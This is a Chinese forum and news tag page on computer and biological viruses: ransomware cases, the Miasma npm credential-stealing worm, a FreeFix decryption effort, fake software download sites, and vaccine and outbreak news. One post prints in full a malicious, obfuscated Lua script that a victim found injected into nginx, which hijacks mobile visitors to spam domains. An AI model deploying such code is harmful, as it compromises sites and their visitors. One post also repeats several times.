/tag/病毒

刷帖子看到 电脑中勒索病毒 ，看了下佬们的分析，可能的原因是windows远程被强行爆破，ai被投毒。 其中分析到，中转站、skill、mcp都可能被投毒。 然后想到自己现在cc、codex都是直接运行在本地工作环境，用的是各公益站(叠甲，真心感谢各位公益大佬)，skill虽然用的不多，但也用了一些。 关键是因为很讨厌运行一会就要去审批，所以直接用的–dangerously-skip-permissions裸奔。 现在回想起来 不禁惊出一身冷汗。 万一哪个环节出一点点问题，那就完球了。 今天赶紧采取了一点预防措施。 安装了VMware ，虚拟了一个windows 11 LTSC，然后把cc和codex迁移到了虚拟机了。宿主机共享了一个工作目录给虚拟机，虚拟机就专门用来跑cc和codex，运行完后宿主机再把成果从共享的工作目录拿出来用。 这样就算以后出问题，也是虚拟机出问题，最多影响共享目录，宿主机也没问题。 或者佬们有没有什么更优雅的方案推荐 1 个帖子 - 1 位参与者 阅读完整话题

此前专注于 NPM 生态系统供应链攻击的黑客组织 TeamPCP 开源发布蠕虫病毒 Mini Shai-Hulud (迷你沙虫)，这类蠕虫病毒具有自我复制的特性，当成功窃取开发环境中的敏感凭据后，会直接调用凭据连接远程资源并继续进行感染和传播，最初迷你沙虫主要针对的是 NPM 生态系统。 现在变种版蠕虫 Miasma 也开源发布： Miasma 是基于迷你沙虫的变种版蠕虫，该蠕虫同样用来发起供应链攻击，主要针对的是 NPM 生态系统和 GitHub，其核心行为包括安装后自动扫描本地和云环境并窃取各类敏感凭证，例如 AWS、GCP、Azure、GitHub Token、SSH 密钥、NPM 令牌、PyPI 令牌等。 当成功窃取凭证后 Miasma 就会顺着这些凭证继续向后感染并传播，例如窃取开发者的 NPM 凭证后会利用凭证发布携带蠕虫本体的软件包，当下游软件安装这些带毒软件包后会继续激活蠕虫然后继续窃取凭证并传播，这种蠕虫的可怕之处就是自我复制能力非常强，所以感染链路很难被彻底斩断。 在 GitHub 上名为杨安永的开发者在其个人账户下开源发布 Miasma 蠕虫病毒并称这是效仿 TeamPCP 的开源精神，仓库代码以 MIT 协议授权让其他黑客也可以下载代码后直接使用，不过很快这个仓库就被删除并且整个开发者账户都被封禁，这显然是 GitHub 执行的操作。 当然有较大概率是这名开发者账号被盗用然后用来开源发布蠕虫，毕竟这名开发者还是比较活跃的，而且在自己的主页上挂着已经备案的个人网站，这种就属于贴脸开大，毕竟要是真开源发布蠕虫那也应该注册小号而不是使用自己的真实账号去发布。 查看评论

前段时间另一家指纹浏览器出问题，换了adspower 今天启动发现安全中心报木马病毒。 删除后文件后在adspower打开浏览器会显示没有网络。有没有和我遇到同样问题的 1 个帖子 - 1 位参与者 阅读完整话题

如题，之前自己的文件因为莫名其妙中了所谓Freefix的病毒，导致文件被加密，很长时间以来一直没办法，只能备份之后等待后人的智慧，直到有一天epc大佬和360把Freefix这个病毒给攻破了，我本来很高兴，觉得得亏没删除那些文件，但后来发现因为我当时电脑文件很多，病毒加密的时候被我发现了，于是还没加密完我就重启电脑打断了加密的过程，导致这个神人病毒反复对我的文件进行加密，在这种情况下文件被反复加密了多次，表现为file.docx.FreeFix.FreeFix.FreeFix.N个后缀，每一次后缀代表着被加密了一次 当时我就尝试了来自epc提供的基于GPU计算的脚本和来自360的基于cpu计算的程序，均无法解密，在联系边亮大佬之后，对方表示多次加密的版本没有办法，推荐我自己做一份程序，但由于epc视频里的那个字体让我不好辨认，于是在后续回复无果的情况下，只能放弃了 但就在四个月前，我萌生了自己制作的想法，于是我先跟“当时”的Gemini沟通可能性，并认可了理论上epc给出的gpu版本的程序应该没有加壳，在使用peid查看之后确实没有，这就意味着我可以从程序内获取精确的密钥范围，于是装回了之前已经删除的ida pro，分析了一下确实没有加壳和混淆，最终成功拿到了密钥范围的字符串，在此之后就好说了 在文件被加密的时候，我还在使用4060m作为主力笔记本，开发过程可能还比较困难，但在恢复开发的时候已经升级成了4090的pc，那解密只能说是分分钟的事，假设加密层数为4，那么解密最坏的情况下需要4 × 2³² ≈ 172 亿次计算 最终在Gemini和其他多种llm合作的情况下，我成功完成了对多层加密的破解 与epc的程序类似，由于文件被多次加密，系统必须强行枚举解密从LN到L1 每一步LN都需要检查文件末尾是否正确解密出了来自LN-1个后缀名，既假如文件被加密了6次，L6就为file.FreeFix.FreeFix.FreeFix.FreeFix.FreeFix.FreeFix，那么解密程序在1完成每一次解密的时候都将检查文件末尾是否变成了5个后缀名，既file.FreeFix.FreeFix.FreeFix.FreeFix.FreeFix，如果变成了5个而不是乱码的话则判断该层已解密，密钥和种子就被保存 最终在L1的时候最后一次解密通过文件头来判断文件是否解密成功 以一份加密了三层的example.jpg.FreeFix.FreeFix.FreeFix(L3层)为例,流程从外层往内层逐层剥 读入原始字节,数出3层 │ ├─ l 3 (最外) │ 1. 解析尾部footer │ 2. 提取本层密文(处理头部冗余) │ 3. 先试缓存种子,未命中再爆破 │ 4. 写入缓存 │ 5. rc4整段解密 → 得到l2的版本 │ ├─ l2 (同上,内层统一算法) │ └─ l1 (最里) 1. 从文件尾里的原始路径或文件名猜扩展名 2. 先试缓存，未命中按签名爆破 若带扩展名没找到,再用空扩展名兜底 3. 写缓存 4. rc4解密 → 得到原始字节 │ └─ 按文件尾里的原始文件名 / 检测到的扩展名命名,写出example.jpg 因此在这里我想为所有可能还存在相关问题的朋友们提供免费解密服务 这也是扩充我工具的适用面，以便更好地服务未来其他可能存在相同问题的人，假如有人提供了文件头比较热门的那些后缀，例如常见图像，文档等格式，那么解密会很顺利，最终解密出的多层key可以直接被拿去套用给其他文件，但如果有的人只剩下了一份冷门文件，那么就会很难破解因为程序不知道你的文件头是什么样的 这次经历也是非常庆幸的一次，庆幸有大佬的朋友也遇到了病毒，庆幸病毒作者技艺不精，庆幸自己还保留有被加密的文件，但同时也是一次警示，我平时基本上都是安全软件挂机，但就在中毒的这次，我因为刚重装系统导致懒得装杀毒软件，结果就这一次就中招了，也是第一次遇到勒索病毒，希望各位谨慎且无论如何留有一个基础的安全防护 如果有需要的欢迎回复本帖，不收取任何费用，但请尽量给我你最重要的文件，要不然实在没这么多时间，请留下你的邮箱，文件类型，使用密码加密打包之后的文件，如果看到了我会单独发邮件联系你获取密码 后续考虑出一个webui来开放以提供自助解密服务 3 个帖子 - 2 位参与者 阅读完整话题

英国剑桥大学科研团队宣布，他们首次将由人工智能完全设计核心成分的一种新型疫苗用于人体试验，尝试为未来可能出现的大范围病毒暴发和新冠类似疫情提供更广谱的预防方案。 研究人员表示，这是首个关键疫苗抗原完全由人工智能算法设计并进入人体临床试验的案例，目标不仅是应对现有的新冠病毒及其变异株，还包括目前主要在动物间传播、但具有跨物种感染人类潜力的多种冠状病毒，从而在下一次大流行出现前“抢先一步”。 这款候选疫苗的概念与传统疫苗不同，它并非针对某一特定毒株，而是试图对整个冠状病毒“家族”构建防线。 人工智能系统首先接收了由全球监测项目采集的大量冠状病毒基因序列，这些序列相当于病毒的“说明书”，涵盖已知能感染人类和动物的不同类型。 随后，算法对这些遗传信息进行分析和模式识别，设计出一种所谓“超级抗原”（super-antigen），用于训练机体免疫系统产生具有广泛交叉反应能力的免疫应答，即便病毒不断变异或新的冠状病毒从动物跃迁到人群，也能在一定程度上识别并发起防御。 在疫苗学中，抗原是疫苗的关键组成部分，是人体免疫系统学习“识别并攻击”的对象。 项目负责人、剑桥大学的乔纳森·希尼（Jonathan Heeney）教授称，这是首次将由人工智能设计的抗原真正用于人体试验，相关技术的表现“令人惊讶”，也显示出“人工智能在造福人类方面的巨大潜力”。 他表示，团队希望做的是开发不仅针对“今天的病毒”，也能提前防范未来有可能引发下一轮暴发或大流行的病原体的疫苗，这将意味着应对大流行的方式出现“根本性转变”。 在新冠疫情期间，疫苗发挥了关键作用，但绝大多数疫苗都以当时流行的具体病毒株为基础进行设计，并在病毒持续变异时不断更新配方。 许多呼吸道病毒，如新冠病毒和季节性流感病毒，都擅长通过变异改变表面结构，从而逃避免疫识别，这也是为何新冠和流感疫苗需要定期更新的原因。 “我们总是落后一步，”希尼指出，而这次的尝试正是希望通过人工智能等新技术，提前锁定病毒家族中的“共性弱点”，在病毒出现变种或跨物种传播之前就完成防御准备。 目前，这款AI设计的冠状病毒候选疫苗已经完成第一阶段小规模人体试验，共有39名受试者参与，主要目的是评估安全性。 发表在《Journal of Infection》期刊上的初步结果显示，该疫苗在激发免疫反应方面的效果被描述为“适中”，但在业内仍引发积极反响。 研究团队已计划开展约200名受试者参与的后续研究，以更全面评估其免疫原性以及对不同冠状病毒的潜在保护能力。 参与部分临床试验工作的南安普顿大学教授索尔·福斯特（Saul Faust）评价称，这种依托人工智能设计抗原的技术“确实很有潜力”，并用“非常令人兴奋”形容该研究方向。 他指出，在应对病毒不断变异、尤其是潜在大流行病原体时，这类技术手段在疫苗设计阶段明显优于传统方法。 剑桥团队并未将目标仅限于冠状病毒，他们已在动物模型上开展通用型季节性流感疫苗的研究，希望未来能摆脱每年更新流感疫苗配方的做法。 此外，团队还在开发H5N1型禽流感疫苗，以应对这种目前正严重危害禽类群体、且被担忧具有大流行风险的病毒一旦在人群中广泛传播的情形。 研究人员也在着手针对病毒性出血热的候选疫苗开发，目标包括不同型别的埃博拉病毒。 当前在刚果民主共和国暴发的出血热疫情由一种尚无现成疫苗的埃博拉病毒种类引起，这使得研发更广谱的出血热疫苗具有现实紧迫性。 牛津大学疫苗集团主任安德鲁·波拉德（Andy Pollard）虽未参与该研究，但表示这一路线在动物实验中已产生“极具吸引力的证据”。 他称相关数据“颇为引人关注”，许多科学家此前并不一定预料到能够通过这种方式诱导出如此类型的免疫反应。 波拉德同时指出，真正的考验在于人体试验结果，因为人类的免疫系统在多年自然感染的塑造下，远比实验室小鼠更为复杂，因而临床效果仍有待观察。 从更广泛的视角看，多位专家认为人工智能有望成为疫苗研究的“游戏规则改变者”。 人工智能工具不仅能够参与设计抗原，还可能被用来预测人体免疫系统对不同疫苗候选物的反应，从而显著加快筛选和研发过程，缩短从病毒出现到疫苗问世的时间，并在未来公共卫生事件中“挽救生命”。 英国国家健康与护理研究院（NIHR）科学总监玛丽安·奈特（Marian Knight）评价称，这一AI设计“超级抗原”的早期人体试验取得的成功，是在实现广谱、持久病毒防护方面“具有转折意义的一步”。 英国科技部长瓦兰斯勋爵（Lord Vallance）则将这一进展称为“又一项英国科学成功案例”，认为这展示了在人工智能技术的加持下，如何将科研优势转化为新型医疗手段。 他强调，伴随人类首批试验结果释放积极信号，这项工作有望在长期内加快疫苗部署步伐，让全球更多人从中受益。 查看评论

cbsnews.com Two researchers charged with allegedly trying to smuggle mpox through Detroit... According to the U.S. Attorney's Office, the two people are accused of providing federal authorities with false statements after arriving at the McNamara Terminal on Jan. 25, 2026. [!quote]+ 据美国检察官办公室称，53岁的荷兰公民文森特·蒙斯特和38岁的喀麦隆公民克劳德·奎被控于2026年1月25日抵达麦克纳马拉航站楼后向联邦当局提供虚假陈述。官员表示，这两名研究人员最初从刚果共和国首都布拉柴维尔入境，当时那里正爆发痢疾疫情。 根据刑事诉状，海关和边境保护局官员发现两人携带一个黑色塑料箱。蒙斯特和奎在被询问时告诉联邦官员，箱子里装的是诊断和检测设备。 进一步检查后，他们在泡沫塑料保温箱中发现了113个装有痢疾杆菌样本的小瓶。据美国检察官办公室称，联邦调查局在发现这些病毒后不久便对其中20个小瓶进行了检测------其中17个小瓶含有"灭活猴痘病毒"，1个小瓶含有水痘病毒，另外2个小瓶含有人类DNA。 联邦调查局底特律分局负责人詹妮弗·鲁尼安在一份声明中表示：“任何研究人员都不应认为他们的职位、资历或专业地位可以凌驾于法律之上。本案的指控非常严重。这些指控涉及将灭活猴痘病毒危险且非法地走私到美国，以及涉嫌误导联邦探员。” 根据起诉书，落基山实验室病毒生态学部门负责人蒙斯特和研究员奎告诉联邦官员，他们的任务是研究可能影响美国的病毒。两人还告诉官员，他们已经在刚果共和国待了一个多星期，研究一种猴痘病毒株。 起诉书称：“蒙斯特和奎并未如实申报其所持有的生物材料的真实身份，也未提供或持有必要的认证文件。相反，他们试图将这些样本冒充为未使用的诊断试剂。” 起诉书还指出，联邦调查局调查人员与美国农业部官员进行了沟通，后者认定蒙斯特和奎需要获得美国农业部的许可才能携带这些材料入境美国。 https://www.politico.com/news/2026/06/02/nih-mpox-munster-indictment-montana-00947793 1 个帖子 - 1 位参与者 阅读完整话题

有人中过吗？可以恢复吗？ 3 个帖子 - 2 位参与者 阅读完整话题

服务器Windows Server 2025，之前关闭了所有安全防护。 之后发现很多文件被加密为.wman后缀文件。 上网研究发现这个病毒通过RDP（远程桌面）弱口令传播。 戏剧性的是，不知道是因为我发现及时，还是病毒强度太低，我大部分的重要文件、数据库都没被加密，只有少部分不重要的文件（比如快捷方式、少量文档、少量电影）被加密。 所以说这个勒索病毒几乎没给我带来任何损失。 但是也因此吸取了教训，千万不要心存侥幸不做任何安全措施。一年前也中过病毒，当时是一个挖矿病毒，但是没造成影响，而且轻松杀掉了，就没引起重视。 现在已经安装上360，之后准备换成卡巴斯基，因为数据隐私方面还是有点顾虑。 3 个帖子 - 3 位参与者 阅读完整话题

香港消费者委员会近日发布了最新防病毒软件评测报告，针对市面上24款适用于Windows及macOS系统的收费与免费产品进行了全面测试。结果显示，13款Windows系统软件同获最高4.5分评价，其中包括4款免费产品（Bitdefender、Avast、AVG、Avira），打破了付费一定更好的固有认知。而微软Windows系统内置的Defender则在多项测试中表现不佳，总评仅获最低的3.5分。 本次测试由国际消费者研究及试验组织（ICRT）统筹，评估项目涵盖整体防护效能、电脑资源占用及使用便利程度三大维度。其中Windows系统样本16款，macOS系统样本8款。 值得注意的是，微软内置的Defender成为本次测试中表现最差的Windows防病毒软件。具体来看，该软件误判率偏高，经常将正常文件识别为恶意程序，导致用户无法顺利下载。 在网络钓鱼测试中，Defender完全未能为Chrome浏览器提供任何防护，此项目仅得1分。而在勒索软件测试中，由于系统未预设启动勒索软件防护功能，测试期间出现大量文件被恶意加密的情况，该项目也仅获2分。 此外，在连续4周不更新的离线环境下，Defender的防御能力同样表现逊色。 在资源占用方面，不同软件之间差异显著。F-Secure Internet Security与McAfeeTotal Protection Essential表现最为突出，分别仅占用868MB与650MB硬盘空间，以及234MB与269MB内存，运行效率最为轻量。而G Data Internet Security、Bitdefender Total Security以及AVG Antivirus Free三款软件则占用较多系统资源，容易拖慢电脑运行速度，在该项目中仅获2分。 对此，香港消委会提醒，没有任何一款网络安全软件能够提供百分之百的绝对防护。用户除了选择合适的安全软件外，还应定期进行系统更新，养成良好的网页浏览习惯，并定期备份重要数据，才能最大程度降低遭受恶意程序侵害的风险。 查看评论

刚刷到短视频然后进行验证了下，然后通过电脑自带edge的bing搜索引擎，搜索下载“向日葵”远程软件，会出现较为相似难以分辨的软件下载页，如下： 从图上第二个伪装的很像向日葵官网的网址下载的软件为zip包： 各位佬友帮人下载远程软件的时候注意区分 1 个帖子 - 1 位参与者 阅读完整话题

打算玩玩codex，然后去Google下载，后面发现好像盗版网站，我被植入了病毒，但是不知道现在有什么影响，就是用火绒还有电脑自带查杀了一下，有没有大神告知一下怎么消毒隐患 电脑打开是这个链接： Соdeх 19 个帖子 - 12 位参与者 阅读完整话题

因为是谷歌排最前面 点进去后看和codex官网长得一样 网页上让用mshta安装 我还想着不用恶心的微软商店了挺好 直接就把命令执行了 然后怎么没反应回过神来才发现不对劲 我在干什么 马上断网加断电 PE重装系统加全部密码换一遍 属于是AI全yolo久了 大脑变得光滑 啥玩意都直接执行不过脑了 搞了一天真是顶级折磨啊 谷歌罪大恶极把这种玩意排最前面 一分钟就给断了 顶多就是把浏览器密码扫走了 我也没加密币给它扫 不过这年头啥都要手机验证码了 密码扫了也没啥用 还是全改了图个心安了 顺便把相同密码的全改成不同了 真不想用浏览器保存密码了 有没有更好的密码管理软件可以推荐推荐 2 个帖子 - 2 位参与者 阅读完整话题

我们的业务主要是web + 软件，没有怎么管移动端，导致这次nginx被植入了病毒都不知道， 具体的病毒就是访问网站移动端检测是苹果手机或者安卓手机就劫持然后跳垃圾网站 codex解析出来的 移动端请求进入网站的 Nginx Nginx 全局 proxy.conf 里被插入了waf.lua waf.lua 读取 User-Agent，如果是 Android/iPhone，就随机跳转到： https://随机子域.histats.cfd/news.html 4.它还会设置： Set-Cookie: k=260528;Path=/;Max-Age=43200 意思是“当天已经劫持过一次”，后续可能放行，降低被发现概率。 附上被植入的脚本 local U = ngx.var.http_user_agent or “” local K = ngx.var.http_cookie or “” local S = os.date(“%y%m%d”) local ua_lc = U:lower() local cn_spiders = { “baiduspider”, “360spider”, “sogouspider”, “shenmaspider”, “petalbot”, “bytedancespider”, “toutiaospider”, “quarkspider”, “yisouspider”, “zoomeye”, “quake”, “fofa”, “hunter”, “chaitin”, “inetcloud”, “dnslog”, } local function is_cn_spider(ua) if ua == “” then return false end for _, pattern in ipairs(cn_spiders) do if ua:find(pattern, 1, true) then return true end end return false end if is_cn_spider(ua_lc) then return ngx.exit(ngx.HTTP_FORBIDDEN) end local is_android = ua_lc:find(“android”) local is_iphone = ua_lc:find(“iphone”) if not (is_android or is_iphone) then return end if K:find(“k=” .. S) then return end ngx.header[“Set-Cookie”] = “k=” .. S .. “;Path=/;Max-Age=43200” if is_iphone and math.random() >= 0.3 then return end local R1 = “lmth.swen/piv.ssoqj//:sptth” local R2 = “lmth.swen/dfc.statsih//:sptth” local function rev(s) return s and string.reverse(s) or “” end local D1 = rev(R1) local D2 = rev(R2) local function strip_proto(full) return full:gsub(“^https?://”, “”) end local H1 = strip_proto(D1) local H2 = strip_proto(D2) local alpha = “abcdefghijklmnopqrstuvwxyz0123456789” local function rand_pref(len) local t = {} for i = 1, len do local idx = math.random(1, #alpha ) t[i] = alpha:sub(idx, idx) end return table.concat(t) end local pool = {H1, H2} local pick = pool[math.random(1, #pool )] or H1 local pref = rand_pref(math.random(3, 7)) local target = “https://” .. pref .. “.” .. pick return ngx.redirect(target, 302) 其实很无奈，不会运维，codex确实棒了大忙，但是nginx这么容易被植入病毒吗？ 求运维大佬解惑 3 个帖子 - 3 位参与者 阅读完整话题

佬友们，最近公司被CobaltStrike入侵植入木马病毒，病毒还会横向扩展，目前已将问题机器全部隔离，并且尝试了各种清杀工具，但是害怕杀不干净，有这方面的佬可以提供些建议吗，图片内的文件是检测出来的异常文件 7 个帖子 - 4 位参与者 阅读完整话题

在刚果民主共和国，埃博拉病毒迄今可能已夺走200多人的生命。该国冲突频仍的东部地区，暴力、不信任以及不堪重负的监测体系，使遏制病毒传播的努力承受沉重压力。根据卫生部周日晚间发布的数据，覆盖东部三个省的11个卫生区已报告超过900例疑似病例。地区数据显示，截至5月23日，累计疑似死亡人数已达210人。 此次疫情暴露出在全球最不稳定地区之一开展埃博拉防控面临重重困难。当地部分地区由武装团体控制，卫生体系脆弱，治疗中心频遭袭击，严重扰乱疫情遏制工作。卫生部数据显示，医务人员在单日内仅能追踪约20%的已识别密切接触者。 “暴力迫使人们逃离，包括卫生和人道主义工作者，”世界卫生组织总干事谭德塞周日在社交媒体表示，“这严重阻碍了扩大埃博拉接触者追踪的能力，也难以及时发现感染病例并提供支持性治疗。” 非洲疾病控制与预防中心总干事Jean Kaseya周日表示，由于区域流动性强以及监测与诊断能力不足，目前已有10个非洲国家被认定面临疫情风险。 查看评论

我的是 E5-2699C v4 做日常使用了 加了声卡 平时 qq 播放音乐的时候 经常一卡一卡的 自打把关闭 Microsoft Defender 给关了以后，从此不再卡顿。已经安装了卡巴斯基优选版替代

我的是 E5-2699C v4 做日常使用了 加了声卡 平时 qq 播放音乐的时候 经常一卡一卡的 自打把关闭 Microsoft Defender 给关了以后，从此不再卡顿。已经安装了卡巴斯基优选版替代

我的是 E5-2699C v4 做日常使用了 加了声卡 平时 qq 播放音乐的时候 经常一卡一卡的 自打把关闭 Microsoft Defender 给关了以后，从此不再卡顿。已经安装了卡巴斯基优选版替代

我的是 E5-2699C v4 做日常使用了 加了声卡 平时 qq 播放音乐的时候 经常一卡一卡的 自打把关闭 Microsoft Defender 给关了以后，从此不再卡顿。已经安装了卡巴斯基优选版替代

我的是 E5-2699C v4 做日常使用了 加了声卡 平时 qq 播放音乐的时候 经常一卡一卡的 自打把关闭 Microsoft Defender 给关了以后，从此不再卡顿。已经安装了卡巴斯基优选版替代